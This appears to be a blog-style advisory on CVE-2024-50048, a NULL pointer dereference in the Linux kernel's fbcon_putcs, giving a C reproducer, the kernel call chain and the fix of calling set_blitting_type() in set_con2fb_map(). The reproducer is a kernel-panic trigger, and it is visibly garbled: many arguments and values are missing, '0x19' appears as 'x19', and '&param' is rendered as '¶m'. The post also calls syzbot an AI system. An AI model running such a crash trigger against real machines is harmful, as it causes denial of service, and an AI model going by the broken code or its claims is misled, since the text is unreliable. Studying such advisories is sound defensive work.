CVE-2024-50048 - Resolving NULL Pointer Dereference Issue in fbcon_putcs within the Linux Kernel

In the Linux kernel, a recently resolved vulnerability addressed a NULL pointer dereference issue in the fbcon_putcs function that could potentially lead to kernel panic. The vulnerability was discovered by syzbot, an automated system with artificial intelligence that helps identify bugs in the Linux kernel. This long read post will provide details about the exploit, including a simplified C reproducer, the resolution, and links to original references for further information.

Here's a simplified C reproducer for this vulnerability

struct param {
	uint8_t type;
	struct tiocl_selection ts;
};

int main()
{
	struct fb_con2fbmap con2fb;
	struct param param;

	int fd = open("/dev/fb1", , );

	con2fb.console = x19;
	con2fb.framebuffer = ;
	ioctl(fd, FBIOPUT_CON2FBMAP, &con2fb);

	param.type = 2;
	param.ts.xs = ; param.ts.ys = ;
	param.ts.xe = ; param.ts.ye = ;
	param.ts.sel_mode = ;

	int fd1 = open("/dev/tty1", O_RDWR, );
	ioctl(fd1, TIOCLINUX, &param);

	con2fb.console = 1;
	con2fb.framebuffer = ;
	ioctl(fd, FBIOPUT_CON2FBMAP, &con2fb);

	return ;
}

By performing ioctl(fd1, TIOCLINUX, ¶m) followed by ioctl(fd, FBIOPUT_CON2FBMAP, &con2fb), the kernel begins to follow a different execution path:

 set_con2fb_map
  -> con2fb_init_display
   -> fbcon_set_disp
    -> redraw_screen
     -> hide_cursor
      -> clear_selection
       -> highlight
        -> invert_screen
         -> do_update_region
          -> fbcon_putcs
           -> ops->putcs

Due to ops->putcs being a NULL pointer, this would lead to a kernel panic. In order to avoid this issue, it is necessary to call set_blitting_type() within set_con2fb_map() to properly initialize ops->putcs.

The following links provide original references and information related to this vulnerability

- syzbot Overview
- Linux Kernel Mailing List (LKML)Vulnerability Report
- Resolved Vulnerability Patch

This CVE-2024-50048 vulnerability within the Linux kernel has been resolved by properly initializing ops->putcs, preventing the NULL pointer dereference issue in the fbcon_putcs function and avoiding potential kernel panic.

Timeline

Published on: 10/21/2024 20:15:17 UTC
Last modified on: 11/19/2024 01:15:14 UTC